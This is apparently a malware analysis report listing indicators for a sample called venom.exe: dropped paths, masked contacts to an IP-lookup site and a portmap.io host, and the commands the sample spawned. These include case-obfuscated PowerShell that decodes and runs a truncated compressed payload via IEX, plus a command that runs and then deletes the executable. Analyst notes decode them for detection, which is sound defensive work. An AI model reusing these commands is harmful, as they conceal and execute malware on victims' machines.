Technical Information
- <Current directory>\venom.exe
- %APPDATA%\logs\04-04-2022
- 'ip##pi.com':80
- 'mi#####9958.portmap.io':39958
- http://ip##pi.com/json/
- DNS ASK ip##pi.com
- DNS ASK mi#####9958.portmap.io
- '<Current directory>\venom.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -command "&{IEx( nEW-ObJECT systeM.Io.COMpRESSION.DEFLAtEStreAm([IO.MEmorYStrEaM][SYSTem.coNvERt]::FrOMbaSE64sTriNG('HYw9D8IgEED/Clsn48Lg+iAGa+LA4EBHKMEPao1a+/flnF7u3r1L06i2SXXPec...
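- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "&{IEx( nEW-ObJECT systeM.Io.COMpRESSION.DEFLAtEStreAm([IO.MEmorYStrEaM][SYSTem.coNvERt]::FrOMbaSE64sTriNG('HYw9D8IgEED/Clsn48Lg+iAGa+LA4EBHKMEPao1a+/flnF7u3r1L06i2SXXPec2v9yXXqjb5kVRY...
  Note: this entry and the cmd.exe entry before it show the same visible command prefix, first as the cmd.exe /c wrapper and then as the powershell.exe process. The mixed letter casing is obfuscation only, because PowerShell names are case-insensitive. The visible part Base64-decodes a blob, wraps it in a DeflateStream and hands the result to IEX. The Base64 payload is truncated in this listing, so its content cannot be determined from this page. Command-line detections for these names should match case-insensitively.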
- '<SYSTEM32>\cmd.exe' /c "powershell -enc YwBtAGQAIAAvAGMAIAAiAEAAZQBjAGgAbwAgAG8AZgBmACAAJgAmACAAdgBlAG4AbwBtAC4AZQB4AGUAIAAmACYAIABkAGUAbAAgAHYAZQBuAG8AbQAuAGUAeABlACIA"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc YwBtAGQAIAAvAGMAIAAiAEAAZQBjAGgAbwAgAG8AZgBmACAAJgAmACAAdgBlAG4AbwBtAC4AZQB4AGUAIAAmACYAIABkAGUAbAAgAHYAZQBuAG8AbQAuAGUAeABlACIA
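- '<SYSTEM32>\cmd.exe' /c "@echo off && venom.exe && del venom.exe"
  Note: the -enc argument in the two entries above is Base64 of UTF-16LE text and decodes to cmd /c "@echo off && venom.exe && del venom.exe", which is the command shown in this entry. It runs venom.exe and then deletes the file; del runs only if the preceding command returns success.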